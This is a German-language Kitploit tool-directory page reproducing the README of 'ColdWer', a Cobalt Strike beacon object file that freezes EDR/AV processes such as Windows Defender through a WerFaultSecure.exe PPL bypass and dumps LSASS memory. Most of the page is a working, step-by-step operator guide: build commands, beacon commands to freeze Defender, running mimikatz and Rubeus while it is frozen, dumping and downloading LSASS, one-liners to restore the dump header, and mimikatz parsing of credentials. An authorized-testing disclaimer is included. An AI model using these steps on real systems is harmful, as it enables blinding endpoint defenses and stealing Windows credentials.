Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ColdWer — Cobalt Strike BOF zum Einfrieren von EDR/AV-Prozessen und Auslesen von LSASS mithilfe des WerFaultSecure.exe PPL-Bypasses | Kitploit
Tools/GitHubGitHub/0xsh3llf1r3/coldwer
Privilege EscalationExploitationLaterale BewegungPost-ExploitationRed TeamingPayload-Entwicklung
GitHub0xsh3llf1r3/coldwer

ColdWer

Cobalt Strike BOF zum Einfrieren von EDR/AV-Prozessen und Auslesen von LSASS mithilfe des WerFaultSecure.exe PPL-Bypasses

Repository anzeigen
144232vor 7 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ColdWer
Ein kalter Krieg auf Ihrem Endpunkt.

Stars Forks License


🥶 ColdWer

ColdWer nutzt den WerFaultSecure.exe PPL-Bypass, um EDR/AV-Prozesse einzufrieren und den LSASS-Arbeitsspeicher auf modernen Windows-Systemen auszulesen.

root@kitploit:~
C O L D W E R
        └─┴─┴── WerFaultSecure
    └─┴──────── LSASS Dump
└─┴──────────── Cold (Freeze)

Frieren Sie Ihr EDR/AV ein. Extrahieren Sie, was Sie brauchen. Bleiben Sie kalt.


👤 Autor

Sh3llf1r3 (@0xsh3llf1r3)


🙏 Danksagungen

Dieses Projekt baut auf Forschungsergebnissen von TwoSevenOneT (@TwoSevenOneT) auf:

ProjektBeschreibung
EDR-FreezeUrsprüngliche EDR-Freeze-Technik
WSASSLSASS-Dump über WerFaultSecure

Alle Anerkennung für die zugrundeliegenden Techniken gebührt TwoSevenOneT.


🔥 Funktionen


🚀 Erste Schritte

📋 Voraussetzungen

  • Cobalt Strike 4.x
  • Beacon mit hoher Integrität (Administrator/SYSTEM)

💾 Installation

  1. Klonen Sie das Repository:
root@kitploit:~
git clone https://github.com/0xsh3llf1r3/ColdWer.git
  1. Laden Sie das Aggressor-Skript in Cobalt Strike:
  • Gehen Sie zu Cobalt Strike → Script Manager
  • Klicken Sie auf Load
  • Wählen Sie cw/coldwer.cna

📦 Aus dem Quellcode erstellen

root@kitploit:~
# Navigieren Sie zum Quellverzeichnis
cd src/

# Kompilieren des BOF (erfordert MinGW)
make

# Oder manuell:
x86_64-w64-mingw32-gcc -c coldwer.c -o ../cw/coldwer.o

📥 Schnell-Download

  1. Gehen Sie zu Releases
  2. Laden Sie coldwer.o und coldwer.cna herunter
  3. Platzieren Sie beide im selben Ordner
  4. Laden Sie coldwer.cna in Cobalt Strike

🖥️ Verwendung

❄️ EDR/AV einfrieren

root@kitploit:~
# Windows Defender PID finden
beacon> ps

# Prozess einfrieren
beacon> cw-freeze 1337

# Befehle ausführen während EDR/AV eingefroren ist
beacon> mimikatz sekurlsa::logonpasswords
beacon> execute-assembly /tools/Rubeus.exe triage

# Auftauen wenn fertig
beacon> cw-unfreeze

🔓 LSASS dumpen

root@kitploit:~

# Schritt 1: Win8.1 WerFaultSecure.exe hochladen
beacon> cd C:\Windows\Temp
beacon> upload /path/to/bin/wfs.exe

# Schritt 2: LSASS PID finden
beacon> ps

# Schritt 3: LSASS dumpen
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# Schritt 4: Dump herunterladen
beacon> download C:\Windows\Temp\lsass.dmp

🔧 Nach dem Download

Ändern Sie den Datei-Header, um das Minidump-Format wiederherzustellen:

Original (PNG)Ändern zu (MDMP)
89 50 4E 474D 44 4D 50

Befehle zum Wiederherstellen des Headers:

MethodeBefehl
Pythonopen('lsass.dmp','r+b').write(b'MDMP')
Bashprintf '\x4d\x44\x4d\x50' | dd of=lsass.dmp bs=1 count=4 conv=notrunc
PowerShell$f=[IO.File]::Open("lsass.dmp","Open","Write");$f.Write([byte[]](0x4D,0x44,0x4D,0x50),0,4);$f.Close()

Anschließend mit Mimikatz parsen:

root@kitploit:~
mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonpasswords

📋 Befehle

BefehlBeschreibung
cw-freeze <PID> [Pfad]Prozess einfrieren
cw-unfreezeZuvor eingefrorenen Prozess auftauen
cw-dump <PID> <Pfad>LSASS-Arbeitsspeicher dumpen

📝 Beispiele

root@kitploit:~
# Einfrieren mit Standardpfad
beacon> cw-freeze 1337

# Benutzerdefinierte WerFaultSecure.exe verwenden
beacon> cw-freeze 1337 C:\Windows\Temp\wfs.exe

# LSASS dumpen
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# Auftauen wenn fertig
beacon> cw-unfreeze

✅ Unterstützte Ziele

ZielStatus
Windows Defender (MsMpEng.exe)✅ Funktioniert
LSASS (lsass.exe)✅ Funktioniert
Andere PPL-Prozesse✅ Funktioniert

⚠️ Einschränkungen

Funktioniert NICHT gegen EDRs mit Kernel-Mode-Selbstschutz:

EDRStatus
Elastic Endpoint❌ Blockiert
CrowdStrike Falcon❌ Blockiert
SentinelOne❌ Blockiert
Carbon Black❌ Blockiert

⚙️ Funktionsweise

root@kitploit:~
1. 🚀 WerFaultSecure.exe als PPL starten (WinTcb-Ebene)
                    ↓
2. 🎯 WerFaultSecure hängt sich an den Zielprozess an
                    ↓
3. ⏸️  MiniDumpWriteDump pausiert alle Ziel-Threads
                    ↓
4. 🥶 WerFaultSecure selbst pausieren → Ziel bleibt eingefroren
                    ↓
5. ✅ Befehle ausführen (EDR/AV kann nichts sehen!)
                    ↓
6. 🔥 WerFaultSecure beenden → Ziel taut auf

🔑 Warum Win8.1 WerFaultSecure?

VersionAusgabe
Windows 10/11Nur verschlüsselter Dump
Windows 8.1Roher, unverschlüsselter Dump

🔍 Fehlerbehebung


⚖️ Haftungsausschluss

root@kitploit:~
⚠️ NUR FÜR AUTORISIERTE SICHERHEITSTESTS

Dieses Tool ist bestimmt für:
- Autorisierte Penetrationstests
- Red-Team-Operationen mit schriftlicher Genehmigung
- Sicherheitsforschung in kontrollierten Umgebungen

Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
Unbefugter Zugriff auf Computersysteme ist illegal.

📜 Lizenz

MIT-Lizenz – Siehe LICENSE


🥶 Bleiben Sie kalt. Bleiben Sie leise. 🥶

⭐ Geben Sie diesem Repository einen Stern, wenn Sie es nützlich finden! ⭐

Tool herunterladen
FunktionBeschreibung
❄️ FreezeVersetzt EDR/AV-Prozesse in einen Koma-Zustand
🔓 DumpExtrahiert LSASS-Speicher unter Umgehung von PPL
🛡️ PPL-BypassNutzt WerFaultSecure.exe auf WinTcb-Ebene
⚡ SchnellInline-BOF-Ausführung
🎯 Manuelle SteuerungSie entscheiden, wann eingefroren und aufgetaut wird
FehlerUrsacheLösung
Datei nicht gefundenUngültiger PfadWerFaultSecure.exe-Pfad überprüfen
Zugriff verweigertNiedrige BerechtigungenAls Administrator/SYSTEM ausführen
Ungültige SignaturNicht signierte BinärdateiOrdnungsgemäß signierte WerFaultSecure.exe verwenden
Prozess existiert nichtFalsche PIDPID mit dem Befehl ps überprüfen
Ziel geschütztKernel-SchutzEDR hat Selbstschutz (nicht umgehbar)
Bereits eingefrorenZustand hängtZuerst cw-unfreeze ausführen